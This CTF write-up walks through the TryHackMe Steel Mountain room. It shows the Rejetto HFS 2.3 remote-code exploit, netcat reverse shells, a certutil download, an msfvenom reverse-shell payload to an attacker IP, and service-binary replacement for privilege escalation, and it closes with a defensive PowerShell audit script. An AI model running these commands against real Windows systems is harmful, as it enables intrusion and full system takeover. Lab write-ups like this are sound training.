CTF-Writeups/TryHackMe/steel_mountain.md
2020-10-27 02:51:49 +05:00


# TryHackMe - Steel Mountain

## Nmap

```
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-26 23:25 PKT
Stats: 0:02:10 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 98.96% done; ETC: 23:27 (0:00:00 remaining)
Stats: 0:02:12 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 98.96% done; ETC: 23:27 (0:00:00 remaining)
Nmap scan report for 10.10.252.157
Host is up (0.18s latency).
Not shown: 988 closed ports
PORT      STATE SERVICE            VERSION
80/tcp    open  http               Microsoft IIS httpd 8.5
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: Site doesn't have a title (text/html).
135/tcp   open  msrpc              Microsoft Windows RPC
139/tcp   open  netbios-ssn        Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds       Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp  open  ssl/ms-wbt-server?
|_ssl-date: 2020-10-26T18:26:37+00:00; 0s from scanner time.
8080/tcp  open  http               HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
|_http-title: HFS /
49152/tcp open  msrpc              Microsoft Windows RPC
49153/tcp open  msrpc              Microsoft Windows RPC
49154/tcp open  msrpc              Microsoft Windows RPC
49155/tcp open  msrpc              Microsoft Windows RPC
49156/tcp open  msrpc              Microsoft Windows RPC
49163/tcp open  msrpc              Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_nbstat: NetBIOS name: STEELMOUNTAIN, NetBIOS user: <unknown>, NetBIOS MAC: 02:84:f3:74:2b:f5 (unknown)
|_smb-os-discovery: ERROR: Script execution failed (use -d to debug)
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2020-10-26T18:26:30
|_  start_date: 2020-10-26T18:21:06
```

## Port 80

Who is the employee of the month?

Visit the web page on port 80 and view the page source; the image file name you find there is the answer to the question.

Scan the machine with nmap. What is the other port running a web server on?

Port 8080

## Port 8080

Clicking the HttpFileServer 2.3 link at the bottom of the page redirects you to the file server's project page.

Take a look at the other web server. What file server is running?

Rejetto Http File Server

What is the CVE number to exploit this file server?

## Searchsploit

Now we know that it is running Rejetto Http File Server version 2.3, so let's find exploits for it.

Let's try this exploit from Exploit-DB:

https://www.exploit-db.com/exploits/39161

Change the local IP and local port in the script to match your listener; keeping the script's default port 443 works fine as well.

Now host nc.exe on your local machine. It can be downloaded from GitHub at https://github.com/int0x33/nc.exe/blob/master/nc.exe, or if you're using Kali Linux it is already available at /usr/share/windows-resources/binaries/nc.exe.

The file can be hosted with Python, but remember to serve it on port 80, because that is the port the exploit script fetches nc.exe from:

```
python3 -m http.server 80
```

Also set up a netcat listener:

```
nc -lvp [port]
```

Run the exploit:

```
python2 39161 8080
```

Run it a second time: the first run only makes the target download nc.exe, and the second run executes it and connects back to your listener.

Now upload winPEAS.exe to the machine: host the file locally with the same HTTP server, then download it on the target with certutil.

```
C:\Users\bill\Desktop>certutil.exe -urlcache -f http://10.14.3.143:80/winPEAS.exe winpeas.exe
certutil.exe -urlcache -f http://10.14.3.143:80/winPEAS.exe winpeas.exe
****  Online  ****
CertUtil: -URLCache command completed successfully.

C:\Users\bill\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 2E4A-906A

 Directory of C:\Users\bill\Desktop

10/26/2020  02:31 PM    <DIR>          .
10/26/2020  02:31 PM    <DIR>          ..
10/26/2020  01:57 PM           600,580 PowerUp.ps1
09/27/2019  05:42 AM                70 user.txt
10/26/2020  02:31 PM           472,064 winpeas.exe
               3 File(s)      1,072,714 bytes
               2 Dir(s)  44,155,019,264 bytes free

C:\Users\bill\Desktop>
```

Now simply run `.\winpeas.exe`.

Its output shows that this service can be exploited, so let's generate a payload named ASCService.exe:

```
msfvenom -p windows/shell_reverse_tcp LHOST=10.14.3.143 LPORT=6666 -e x86/shikata_ga_nai -f exe -o ASCService.exe
```

Set up the netcat listener and stop the service; after that, upload the payload to the target machine and start the service again.

Stopping the service:

```
C:\Program Files (x86)\IObit\Advanced SystemCare>sc stop AdvancedSystemCareService9
sc stop AdvancedSystemCareService9

SERVICE_NAME: AdvancedSystemCareService9
        TYPE               : 110  WIN32_OWN_PROCESS  (interactive)
        STATE              : 4  RUNNING
                                (STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0
```
Starting the service again launches the replaced binary.

## Metasploit

Now we want to escalate our privileges, so we run the PowerUp.ps1 PowerShell script to look for misconfigurations on the target Windows machine.

To get a PowerShell prompt inside the Meterpreter session, first run `load powershell`, then `powershell_shell`.

Run `. .\PowerUp.ps1` followed by `Invoke-AllChecks`.

Now look for a service with CanRestart set to True.

The name of that service is AdvancedSystemCareService9, the same service winPEAS flagged above, so the payload, stop, upload and restart steps are the same as described earlier.
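The weakness PowerUp reports here is a service whose executable (or its folder) ordinary users can overwrite while also being allowed to restart it. The script below is an added example, not part of the original writeup or of PowerUp, that a defender can run in an elevated PowerShell to find every service with that misconfiguration so it can be fixed before an attacker uses it; the SID list and the set of rights treated as write access are my assumptions.

```powershell
# Added example (not from the original writeup): audit services whose binary or
# binary folder is writable by low-privilege principals. Read-only; changes nothing.

# Assumed low-privilege principals: Everyone, Authenticated Users, BUILTIN\Users.
$lowPrivSids = @('S-1-1-0', 'S-1-5-11', 'S-1-5-32-545')
# Rights that let a user replace the file or rewrite its ACL.
$dangerous = [System.Security.AccessControl.FileSystemRights]'Modify, WriteData, AppendData, ChangePermissions, TakeOwnership'

function Get-ServiceBinaryPath {
    # Win32_Service.PathName may be quoted or unquoted and may carry arguments.
    param([string]$PathName)
    if ([string]::IsNullOrWhiteSpace($PathName)) { return $null }
    if ($PathName.StartsWith('"')) { return ($PathName -split '"')[1] }
    if ($PathName -match '^(?<exe>.*?\.exe)') { return $Matches['exe'] }
    return ($PathName -split ' ')[0]
}

function Get-LowPrivWriter {
    # Returns the first low-privilege identity with a write-class Allow ACE on $Path, else $null.
    param([string]$Path)
    try { $acl = Get-Acl -LiteralPath $Path -ErrorAction Stop } catch { return $null }
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        try { $sid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value }
        catch { continue }
        if (($lowPrivSids -contains $sid) -and (($ace.FileSystemRights -band $dangerous) -ne 0)) {
            return $ace.IdentityReference.Value
        }
    }
    return $null
}

Get-CimInstance Win32_Service | ForEach-Object {
    $bin = Get-ServiceBinaryPath $_.PathName
    if (-not $bin -or -not (Test-Path -LiteralPath $bin)) { return }
    # Check the executable and its folder: a writable folder allows delete-and-replace.
    foreach ($target in @($bin, (Split-Path -Parent $bin))) {
        $who = Get-LowPrivWriter $target
        if ($who) {
            [pscustomobject]@{
                Service   = $_.Name
                RunsAs    = $_.StartName
                StartMode = $_.StartMode
                Writable  = $target
                GrantedTo = $who
            }
        }
    }
} | Format-Table -AutoSize
```

Every row is a finding to remediate by removing the write grant (or moving the service into an administrator-only directory); a service that runs as LocalSystem is the most urgent, since that is the path this room uses.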
